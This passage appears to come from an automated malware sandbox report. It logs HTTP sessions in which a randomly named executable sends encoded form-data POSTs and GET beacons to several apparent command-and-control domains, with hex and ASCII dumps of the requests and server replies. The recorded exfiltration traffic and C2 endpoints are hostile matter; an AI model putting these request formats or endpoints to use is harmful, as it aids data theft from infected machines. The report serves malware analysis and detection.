                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 33 64 71 52 59 43 4a 6d 30 6a 6a 51 77 48 6e 68 61 6c 64 54 57 68 73 4e 71 41 49 48 39 48 53 4d 57 5a 34 49 31 4e 36 39 57 4b 42 4f 30 7a 59 31 45 66 4e 36 50 50 4a 6f 66 31 73 37 54 79 44 34 63 66 71 69 69 6a 2b 4f 48 58 75 70 72 54 72 4b 51 78 6c 6f 68 4d 69 52 44 54 72 2f 67 5a 38 69 43 61 2b 56 55 37 51 6d 37 4a 2b 36 4e 67 45 6d 2b 76 64 30 6a 66 50 47 32 79 65 6e 64 6b 47 73 6f 2b 4e 31 63 4c 38 4b 42 4a 7a 72 73 2b 70 37 36 78 72 4f 7a 65 34 7a 56 7a 4b 63 4b 55 6f 7a 36 56 66 5a 47 30 31 37 38 2f 54 61 56 30 75 32 69 30 39 2b 62 68 4f 49 38 33 39 56 36 53 33 62 4c 52 42 70 66 66 37 4d 49 42 69 6f 6c 4c 51 78 30 64 6f 45 55 67 66 42 51 4b 4d 65
                                                                        Data Ascii: N6gPj2W=3dqRYCJm0jjQwHnhaldTWhsNqAIH9HSMWZ4I1N69WKBO0zY1EfN6PPJof1s7TyD4cfqiij+OHXuprTrKQxlohMiRDTr/gZ8iCa+VU7Qm7J+6NgEm+vd0jfPG2yendkGso+N1cL8KBJzrs+p76xrOze4zVzKcKUoz6VfZG0178/TaV0u2i09+bhOI839V6S3bLRBpff7MIBiolLQx0doEUgfBQKMe
                                                                        Nov 7, 2024 10:10:11.712697983 CET303INHTTP/1.1 405 Not Allowed
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 09:10:11 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 154
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.54998352.20.84.62802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:10:13.597990036 CET1640OUTPOST /qfwu/ HTTP/1.1
                                                                        Host: www.seraph.best
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.seraph.best
                                                                        Referer: http://www.seraph.best/qfwu/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 33 64 71 52 59 43 4a 6d 30 6a 6a 51 77 48 6e 68 61 6c 64 54 57 68 73 4e 71 41 49 48 39 48 53 4d 57 5a 34 49 31 4e 36 39 57 4b 5a 4f 30 68 41 31 4c 65 4e 36 4f 50 4a 6f 45 56 73 2b 54 79 44 6c 63 66 43 63 69 6a 79 6b 48 56 6d 70 74 78 54 4b 52 41 6c 6f 72 4d 69 52 5a 7a 72 2b 6b 5a 38 4e 43 65 61 5a 55 36 67 6d 37 4a 2b 36 4e 6d 41 6d 36 2b 64 30 6c 66 50 42 31 79 65 6a 4c 55 47 49 6f 2f 6b 43 63 4c 49 61 43 35 54 72 72 61 4e 37 34 6b 48 4f 79 2b 34 78 57 7a 4b 55 4b 55 6b 34 36 56 43 6f 47 31 52 64 38 2f 72 61 56 7a 48 48 33 77 78 37 45 41 4f 51 34 30 31 62 34 46 2b 33 55 67 6b 66 59 49 58 49 4c 53 69 44 6c 76 30 65 2b 35 34 4f 4f 33 62 5a 43 39 39 64 4d 50 6b 71 41 64 42 55 54 4a 42 46 79 72 53 56 52 4f 7a 7a 69 39 42 2b 6d 70 6d 66 34 51 34 77 44 79 41 6b 33 78 39 61 43 31 4f 51 66 50 38 69 74 77 76 77 43 35 47 4a 30 56 36 62 31 54 36 52 4e 33 4a 71 6c 70 79 6a 38 7a 68 74 42 7a 57 63 42 53 2f 49 41 56 50 70 77 68 32 54 34 39 48 39 6f 4a 43 6e 2b 73 42 53 66 49 50 54 33 36 [TRUNCATED]
                                                                        Data Ascii: N6gPj2W=3dqRYCJm0jjQwHnhaldTWhsNqAIH9HSMWZ4I1N69WKZO0hA1LeN6OPJoEVs+TyDlcfCcijykHVmptxTKRAlorMiRZzr+kZ8NCeaZU6gm7J+6NmAm6+d0lfPB1yejLUGIo/kCcLIaC5TrraN74kHOy+4xWzKUKUk46VCoG1Rd8/raVzHH3wx7EAOQ401b4F+3UgkfYIXILSiDlv0e+54OO3bZC99dMPkqAdBUTJBFyrSVROzzi9B+mpmf4Q4wDyAk3x9aC1OQfP8itwvwC5GJ0V6b1T6RN3Jqlpyj8zhtBzWcBS/IAVPpwh2T49H9oJCn+sBSfIPT36sD18AJedRncF3asm02yjHSyZOlGLmEFHRZ+013phepQbCw8aAxCbzip3plGkqQyqfC/O6FOec6Zp5ZVk3mRHiFLqsutpsLTJ8VE0PIQbiKdzC05LdWFQMIw/aIeEPbcp4ty9smixszp/A4KEwxzqPlUejsH2YE1u3rrj+INvJhbVkRiqRjObiZzWaDPlaACO//9UH8CtygW7/d6VMUJkTich96+JOP+d5SetMNVkBF5psqQjjh9JOnF7yexpn5k9xIfISbMdgl/7o4rErxd3Omd0Pi8wDraFpmpJIjMtSf9IwYizvZqNyQTDTMWRwdy9dZZFCR+t9NT9FSsuSwTfeLn7sfTpu6GAIqgczPcj3ohBlogExX9t1rf8lHYj7TY4/INBGpmfmPg527qs8lzQ7EXAFdibtphWmKZS/hIuw1JUvt1g6JaFqCiCO3BjrXeOTZ5yPge7aZfZFwE5Vnya9wPXtqOFEbV1yBMTX8ROj4BG7XL5AqRym/8hLeATdcVMWoxCcYxEGg9wrBAczja74LdyBy0j6w/nABYAj4Wtv9n2Is2OMjt26C5MBWm4C4IYETnLdOYjlG0KHHGQQZga9VpzJ2e0HOZwz9fgjfqoQBTJ3X+1M10jwBm1vctjFhHuqSmvPuX/xfHdUD4jaVKPAtR75uwi93L77I [TRUNCATED]
                                                                        Nov 7, 2024 10:10:14.596352100 CET303INHTTP/1.1 405 Not Allowed
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 09:10:14 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 154
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.54998452.20.84.62802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:10:16.140602112 CET354OUTGET /qfwu/?N6gPj2W=6fCxb2xLzjzF4nD7KjQhWEUB1Dc/xE2Ac7kR0Mi0XoRopjw7HNNCf6pSJ3AnVDHsLPCXmSmdJmWxpgfBXwwA4t7semSG378seryKT9cw4v33ezM47Ih1j5HvwkKKbWbCpg==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.seraph.best
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:10:17.809206963 CET359INHTTP/1.1 307 Temporary Redirect
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 09:10:17 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 168
                                                                        Connection: close
                                                                        Location: http://www.seraph.best/
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.5499853.33.130.190802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:10:23.030611038 CET603OUTPOST /o5fg/ HTTP/1.1
                                                                        Host: www.owinvip.net
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.owinvip.net
                                                                        Referer: http://www.owinvip.net/o5fg/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 30 71 50 49 50 72 48 59 75 45 6c 36 44 39 4e 68 35 54 72 65 65 6e 70 7a 71 4d 79 30 33 30 36 46 48 7a 67 50 4a 6c 31 38 52 48 79 6e 74 62 70 44 69 30 4e 37 31 75 53 7a 4c 51 4b 61 35 69 38 64 66 58 33 68 37 34 46 57 34 53 53 47 6c 4d 44 39 39 76 55 61 46 2b 59 4e 34 68 54 4a 77 52 6f 4f 75 46 74 52 48 39 68 49 56 57 49 37 56 42 41 73 76 6f 38 49 61 51 45 41 78 68 6b 39 59 48 62 76 54 48 59 48 72 4c 79 77 62 37 4e 74 73 68 6c 6a 35 39 73 75 30 72 43 75 65 64 53 39 6f 4b 62 36 63 4f 68 55 30 62 2b 68 52 45 70 4a 35 73 54 61 57 4b 52 4a 56 56 5a 2b 48 56 74 37 32 44 4d 6b 57 37 4b 36 48 61 73 3d
                                                                        Data Ascii: N6gPj2W=0qPIPrHYuEl6D9Nh5TreenpzqMy0306FHzgPJl18RHyntbpDi0N71uSzLQKa5i8dfX3h74FW4SSGlMD99vUaF+YN4hTJwRoOuFtRH9hIVWI7VBAsvo8IaQEAxhk9YHbvTHYHrLywb7Ntshlj59su0rCuedS9oKb6cOhU0b+hREpJ5sTaWKRJVVZ+HVt72DMkW7K6Has=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.5499863.33.130.190802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:10:25.573168993 CET623OUTPOST /o5fg/ HTTP/1.1
                                                                        Host: www.owinvip.net
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.owinvip.net
                                                                        Referer: http://www.owinvip.net/o5fg/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 30 71 50 49 50 72 48 59 75 45 6c 36 46 75 46 68 2b 30 48 65 5a 48 70 79 70 4d 79 30 2b 55 36 4a 48 7a 73 50 4a 68 6b 6e 52 31 57 6e 74 36 35 44 6a 78 35 37 79 75 53 7a 44 77 4b 66 33 43 38 61 66 58 7a 66 37 34 35 57 34 53 47 47 6c 4d 7a 39 39 63 38 5a 45 75 59 50 6a 52 54 50 74 42 6f 4f 75 46 74 52 48 35 4a 69 56 57 51 37 56 30 51 73 70 36 55 4c 57 77 45 44 68 78 6b 39 50 33 62 6a 54 48 59 31 72 50 79 57 62 39 52 74 73 6a 74 6a 33 4d 73 74 76 37 43 73 61 64 53 32 6f 50 79 32 62 50 6c 59 32 5a 36 69 46 56 78 42 34 61 69 77 4d 6f 5a 68 47 31 31 47 58 47 6c 4d 6e 7a 74 4e 4d 59 61 4b 5a 4e 36 4a 48 4e 4c 69 63 77 54 58 51 61 2b 32 72 56 6c 58 50 2b 79 55
                                                                        Data Ascii: N6gPj2W=0qPIPrHYuEl6FuFh+0HeZHpypMy0+U6JHzsPJhknR1Wnt65Djx57yuSzDwKf3C8afXzf745W4SGGlMz99c8ZEuYPjRTPtBoOuFtRH5JiVWQ7V0Qsp6ULWwEDhxk9P3bjTHY1rPyWb9Rtsjtj3Mstv7CsadS2oPy2bPlY2Z6iFVxB4aiwMoZhG11GXGlMnztNMYaKZN6JHNLicwTXQa+2rVlXP+yU


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.5499873.33.130.190802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:10:28.113079071 CET1640OUTPOST /o5fg/ HTTP/1.1
                                                                        Host: www.owinvip.net
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.owinvip.net
                                                                        Referer: http://www.owinvip.net/o5fg/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 30 71 50 49 50 72 48 59 75 45 6c 36 46 75 46 68 2b 30 48 65 5a 48 70 79 70 4d 79 30 2b 55 36 4a 48 7a 73 50 4a 68 6b 6e 52 31 65 6e 73 4b 6c 44 6c 53 68 37 7a 75 53 7a 4e 51 4b 65 33 43 39 66 66 52 62 44 37 34 30 74 34 51 2b 47 6a 66 4c 39 30 4a 49 5a 4f 75 59 50 72 78 54 4b 77 52 6f 62 75 47 56 64 48 39 56 69 56 57 51 37 56 31 67 73 2f 59 38 4c 51 77 45 41 78 68 6b 68 59 48 62 50 54 48 78 43 72 50 2b 67 62 4c 68 74 73 41 46 6a 37 65 45 74 79 72 43 69 64 64 54 32 6f 50 33 30 62 50 70 2b 32 59 50 4a 46 55 46 42 36 4f 66 58 52 62 42 64 62 54 68 6c 54 6c 5a 51 79 6d 30 73 42 62 33 34 63 50 75 2f 45 50 62 52 55 31 75 55 61 66 57 35 35 45 35 54 4f 35 6e 6d 71 61 4a 4d 6e 63 4f 75 71 34 34 53 6c 76 61 31 38 4a 69 6b 4e 78 6d 4a 68 6f 61 79 4a 31 33 63 6c 4c 64 35 31 76 70 42 42 62 52 78 67 75 50 70 50 6c 77 36 77 67 54 4a 30 69 73 52 44 65 2b 46 63 44 57 68 34 61 48 51 6c 79 2f 71 44 58 4d 75 35 73 34 76 64 6a 57 52 66 72 62 47 4a 61 53 65 52 6c 7a 74 5a 59 69 34 72 4f 44 61 31 61 [TRUNCATED]
                                                                        Data Ascii: N6gPj2W=0qPIPrHYuEl6FuFh+0HeZHpypMy0+U6JHzsPJhknR1ensKlDlSh7zuSzNQKe3C9ffRbD740t4Q+GjfL90JIZOuYPrxTKwRobuGVdH9ViVWQ7V1gs/Y8LQwEAxhkhYHbPTHxCrP+gbLhtsAFj7eEtyrCiddT2oP30bPp+2YPJFUFB6OfXRbBdbThlTlZQym0sBb34cPu/EPbRU1uUafW55E5TO5nmqaJMncOuq44Slva18JikNxmJhoayJ13clLd51vpBBbRxguPpPlw6wgTJ0isRDe+FcDWh4aHQly/qDXMu5s4vdjWRfrbGJaSeRlztZYi4rODa1a1USO04mnH+9XjfAANqogkuBL9RZJ1zSvff8XjRopUjnzVxjvp8/heiufWa+sTMpQIzALocneDbLpzOpo/NlWKTmpvixXHVOV7r8dNgPaiGo+gvg5krMMT0yf4ab2ctcV6s05+7Zl9xTyGLp06u2t2b8HpJA870sK9+uiMTkfRhCKqVM+nXskpZvuXQuUnqwUfVAgwFEWQ5nV0T1kMGRlxxhsSfDBjCQe61OnmyfqaxLsHmZSgbu5EJKaRd8ufpi6SP+bDC7s77buK7VzeKcgVOWJUyVQkI7CBfVOCL87Or/JRg7VJ/Kd+ELS5RkN+cT/oCE4XYFIkRQu7vpMwv8p+Z2PAuIh/VNxDPSJa1M0K6kdfn4SIlKQAlNQkCgC1aV5Lk0EYXQccTTMQ4yG99Bc/T7WeUPV2UMY+rAVPZbGvdJGxSem3O3QsCCfdA+iapHiYdsyOqgZoT/K+z4RZEi7Wbbpke/NiEjdqVX4mgnvNdLtWSN378wLk+o9g7ZMU9gbvnbZPkriCNb8vXqy2ibN/kINEJA4m+kWfCtc5reSkxQmIKVBsIXHgNJpJ7RJI30FEhCEeP9j9WMVRTvdR1ljtfJyPEfFObsKGmI0QG7KoneWr+S4KSunYQzLbvfYQZ1dfvDJhJNCDAn1wdQxWtO5BTZfNP8bNwm0Ed [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.5499883.33.130.190802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:10:30.657022953 CET354OUTGET /o5fg/?N6gPj2W=5onoMf6BmQl2QeVt/VrvVQYA8O/0+XqHKAgaJU0renyYnLBIrjMEkLORFTCyyhU0JhHfx4R92TWl4c733/RJY99e60Kw3j0IgWhxS41JWxIsLFgO3NczRgQE1UQqfRS1SQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.owinvip.net
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:11:02.626003027 CET416INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 09:11:02 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 276
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 36 67 50 6a 32 57 3d 35 6f 6e 6f 4d 66 36 42 6d 51 6c 32 51 65 56 74 2f 56 72 76 56 51 59 41 38 4f 2f 30 2b 58 71 48 4b 41 67 61 4a 55 30 72 65 6e 79 59 6e 4c 42 49 72 6a 4d 45 6b 4c 4f 52 46 54 43 79 79 68 55 30 4a 68 48 66 78 34 52 39 32 54 57 6c 34 63 37 33 33 2f 52 4a 59 39 39 65 36 30 4b 77 33 6a 30 49 67 57 68 78 53 34 31 4a 57 78 49 73 4c 46 67 4f 33 4e 63 7a 52 67 51 45 31 55 51 71 66 52 53 31 53 51 3d 3d 26 79 78 2d 3d 64 46 39 64 59 58 39 70 51 52 2d 78 49 68 46 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?N6gPj2W=5onoMf6BmQl2QeVt/VrvVQYA8O/0+XqHKAgaJU0renyYnLBIrjMEkLORFTCyyhU0JhHfx4R92TWl4c733/RJY99e60Kw3j0IgWhxS41JWxIsLFgO3NczRgQE1UQqfRS1SQ==&yx-=dF9dYX9pQR-xIhFp"}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.549989172.96.191.232802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:11:07.697729111 CET630OUTPOST /9rsa/ HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.thefokusdong43.click
                                                                        Referer: http://www.thefokusdong43.click/9rsa/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 42 4c 79 6b 6b 46 73 74 2f 38 4b 52 49 51 51 48 41 6d 43 46 6f 4f 64 6d 35 4f 43 51 6c 6f 6f 74 57 4f 6b 34 44 4b 50 6b 39 45 41 4c 63 61 50 74 57 2f 4a 34 4e 36 57 64 64 4e 36 56 74 35 2b 4c 35 72 63 4f 75 6a 68 4d 54 4b 73 6f 50 55 48 6d 46 43 73 2b 61 36 6f 68 69 52 44 4f 51 78 45 78 50 65 71 37 76 4f 35 4b 53 32 74 38 53 47 68 72 6d 42 76 34 6d 2f 6a 35 34 5a 57 75 6b 53 62 5a 50 2b 65 52 62 44 64 47 4b 47 38 42 53 44 36 64 6c 4f 56 4f 63 35 49 35 6f 55 6f 50 67 53 32 45 59 59 78 55 30 4e 7a 55 45 66 56 2b 4a 57 54 66 77 54 6c 2f 67 48 39 4d 65 4d 75 58 6e 30 49 73 75 58 48 77 4d 38 6f 3d
                                                                        Data Ascii: N6gPj2W=BLykkFst/8KRIQQHAmCFoOdm5OCQlootWOk4DKPk9EALcaPtW/J4N6WddN6Vt5+L5rcOujhMTKsoPUHmFCs+a6ohiRDOQxExPeq7vO5KS2t8SGhrmBv4m/j54ZWukSbZP+eRbDdGKG8BSD6dlOVOc5I5oUoPgS2EYYxU0NzUEfV+JWTfwTl/gH9MeMuXn0IsuXHwM8o=
                                                                        Nov 7, 2024 10:11:08.701948881 CET1033INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Thu, 07 Nov 2024 09:11:08 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.549990172.96.191.232802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:11:10.243113995 CET650OUTPOST /9rsa/ HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.thefokusdong43.click
                                                                        Referer: http://www.thefokusdong43.click/9rsa/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 42 4c 79 6b 6b 46 73 74 2f 38 4b 52 4b 78 67 48 47 42 32 46 76 75 64 6c 79 75 43 51 76 49 6f 70 57 4f 6f 34 44 49 2f 4f 39 53 34 4c 63 2b 4c 74 58 2b 4a 34 4d 36 57 64 53 74 36 51 67 5a 2b 41 35 73 56 37 75 69 64 4d 54 4b 34 6f 50 58 54 6d 46 77 45 39 61 71 6f 6a 36 68 44 4d 50 42 45 78 50 65 71 37 76 4f 73 43 53 32 31 38 53 33 52 72 6d 6b 62 2f 34 76 6a 2b 76 70 57 75 79 69 62 64 50 2b 65 6a 62 42 35 67 4b 46 45 42 53 47 47 64 72 2f 56 52 56 35 49 7a 73 55 70 66 6a 54 48 65 51 65 42 6a 39 72 6d 70 61 2f 5a 64 49 67 69 31 71 78 74 58 7a 6e 52 30 4f 66 6d 67 32 45 70 46 30 30 58 41 53 72 2b 4a 39 52 57 76 77 41 64 43 4a 70 65 79 68 4a 49 6e 6e 43 43 76
